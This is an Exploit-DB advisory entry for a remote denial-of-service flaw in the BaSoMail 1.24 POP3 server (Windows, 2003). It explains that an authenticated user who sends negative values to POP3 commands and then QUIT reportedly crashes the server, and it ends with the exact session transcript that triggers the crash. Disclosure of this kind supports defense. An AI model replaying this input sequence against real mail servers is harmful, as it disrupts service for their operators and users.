BaSoMail 1.24 - POP3 Server Denial of Service

EDB-ID:

22667

CVE:

N/A


Author:

Ziv Kamir

Type:

dos


Platform:

Windows

Date:

2003-05-28


source: https://www.securityfocus.com/bid/7724/info

BaSoMail POP3 server has been reported prone to a remote denial of service vulnerability.

It has been reported that a remote authenticated attacker, may supply negative value integers to several POP3 commands successively. If the attacker then invokes the QUIT command the BaSoMail server will reportedly fail, possibly due to an internal exception. 

+OK Welcome to BaSoMail (www.BaSo.no)
user XXXX
+OK
pass XXXX
+OK Access granted
list -0
dele -0000
quit